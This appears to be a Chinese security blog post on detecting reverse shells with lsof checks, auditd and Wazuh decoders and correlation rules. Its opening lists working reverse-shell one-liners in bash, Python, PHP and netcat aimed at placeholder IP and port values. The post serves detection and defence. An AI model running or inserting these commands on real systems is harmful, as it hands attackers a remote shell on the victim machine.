常見反彈:
bash -i >& /dev/tcp/ip/port?0>&1
python -c?"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
php -r?'exec("bash -i >& /dev/tcp/ip/port 0>&1");'
php -r?'$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
nc -e /bin/bash ip port
測試截圖:
nc:
bash:
反彈原理:簡單來說就是被控制端發(fā)起對控制端監(jiān)聽端口的請求,并將命令行的輸入輸出轉(zhuǎn)到控制端,相當于我們常見的客戶端及服務端角色反轉(zhuǎn)。
參考:
https://www.freebuf.com/articles/system/187584.html
https://cloud.tencent.com/developer/article/1527568
https://xz.aliyun.com/t/2548?原理深入
https://www.cnblogs.com/ginvip/p/6350222.html文件標識符FD的解釋
規(guī)則設計:如果bash進程有遠程socket但是沒有tty,那么就認定是一個反彈shell
1、檢查/bin/bash進程(ps -ef|grep bash)
2、lsof -p $pid
3、遍歷lsof結(jié)果
當TYPE中包含CHR且NAME中有(tty|pts|ptmx)
TYPE中包含'IP',并且該行包括關鍵字'ESTABLISHED',并獲取控制端IP信息,正則匹配->和:之間的IP:(?<=->)((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}(?=:)
FD為'cwd',展示該行的NAME
wazuh配置
1、配置audit告警/bin/bash執(zhí)行,agent端配置:
auditctl -w /bin/bash -p x -F key=audit-wazuh-c
2、wazuh告警
rule.id:80792
3、依據(jù)audit內(nèi)容調(diào)整規(guī)則,但是wazuh是以日志為前提條件產(chǎn)生告警的,因此無法通過規(guī)則來觸發(fā)執(zhí)行,以下檢測方式只能通過腳本執(zhí)行:
? ?exe="/bin/bash"+type=EXECVE+包含=“-i”
? ?執(zhí)行l(wèi)sof -p $pid
? ?判斷TYPE中包含'IP',并且該行包括關鍵字'ESTABLISHED',并獲取控制端IP信息,正則匹配->和:之間的IP:(?<=->)((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}(?=:)
4、通過端口以及進程來判斷
客戶端配置/bin/bash的監(jiān)控:auditctl -w /bin/bash -p x -F key=audit-wazuh-c
配置執(zhí)行命令:netstat -antlp | grep ESTABLISHED | egrep '/(bash|sh)'? (rule.id=100005)
當10005和80792同時出現(xiàn)時,存在反彈shell,告警100006
agent.conf 編寫:
<agent_config>
?????<wodle name="command">
????????<disabled>no</disabled>
????????<tag>reverse shell test</tag>
????????netstat -antlp | grep ESTABLISHED | egrep?'/(bash|sh)'</command> #查看是否存在以bash或者sh為名的遠程連接
????????<interval>5s</interval>
????????<ignore_output>no</ignore_output>
????????<run_on_start>yes</run_on_start>
????????<timeout>0</timeout>
????</wodle>
</agent_config>
decoders.xml編寫
<decoder name="check_reverse_shell">
????<prematch>^tcp</prematch>
</decoder>
<decoder name="check_revsrse_shell_info">
????<parent>check_reverse_shell</parent>
????<regex offset="after_parent">\s*(\d+)\s*</regex>? #wazuh上適用的regex不一樣,需嚴格遵守官網(wǎng)https://documentation.wazuh.com/3.10/user-manual/ruleset/ruleset-xml-syntax/regex.html#os-regex-or-regex-syntax
????<order>send_q</order>
</decoder>
<decoder name="check_revsrse_shell_info">
????<parent>check_reverse_shell</parent>
????<regex offset="after_regex">\s*(\d+\p\d+\p\d+\p\d+)</regex>
????<order>srcip</order>
</decoder>
<decoder name="check_revsrse_shell_info">
????<parent>check_reverse_shell</parent>
????<regex offset="after_regex">\p(\d+)</regex>
????<order>srcport</order>
</decoder>
<decoder name="check_revsrse_shell_info">
????<parent>check_reverse_shell</parent>
????<regex offset="after_regex">\s*(\d+\p\d+\p\d+\p\d+)</regex>
????<order>dstip</order>
</decoder>
<decoder name="check_revsrse_shell_info">
????<parent>check_reverse_shell</parent>
????<regex offset="after_regex">\p(\d+)</regex>
????<order>dstport</order>
</decoder>
rule.xml編寫
<group name="attack,">
????<rule id="100005"?level="7">? #不能在此就和80792匹配,官網(wǎng)沒有找到答案,在默認規(guī)則里也沒有找到,猜測可能是因為該條規(guī)則通過日志解析以及l(fā)evel配置后是必定會告警,但是與if_sid的前提條件產(chǎn)生先有蛋還是先有雞的沖突,因此需要在規(guī)則匹配產(chǎn)生告警后,才能進一步去關聯(lián)
????????<decoded_as>check_reverse_shell</decoded_as>
????????<match>ESTABLISHED</match>
????????<regex>/bash|/sh</regex>
????????<description>bash|sh netstat information</description>
????</rule>
????<rule id="100006"?level="12"?timeframe="10"?frequency="2">
????????<if_sid>100005</if_sid>
????????<if_matched_sid>80792</if_matched_sid>
????????<description>There could be reverse shell.Plz check.</description>
????</rule>
</group>
告警展示
